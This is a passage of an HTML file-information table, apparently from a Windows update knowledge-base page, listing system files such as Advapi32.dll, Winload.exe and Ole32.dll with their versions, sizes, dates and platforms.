applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>46,592</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24367</td><td>1,016,512</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24367</td><td>931,520</td><td>28-Apr-2018</td><td>02:58</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:38</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24362</td><td>1,016,512</td><td>10-Apr-2018</td><td>19:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24259</td><td>931,560</td><td>15-Dec-2017</td><td>14:05</td><td>x86</td><td>Not 
applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,240</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>10,752</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>8,192</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll</td><td>6.0.6002.24259</td><td>650,984</td><td>15-Dec-2017</td><td>14:05</td><td>x86</td><td>Not applicable</td></tr><tr><td>Driver.stl</td><td>Not applicable</td><td>4,349</td><td>15-Dec-2017</td><td>14:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Rpcss.dll</td><td>6.0.6002.24367</td><td>554,496</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>4,096</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Csrsrv.dll</td><td>6.0.6002.24367</td><td>49,664</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>896,000</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>229,376</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>245,760</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>286,720</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>196,608</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>237,568</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>221,184</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>147,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>180,224</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not 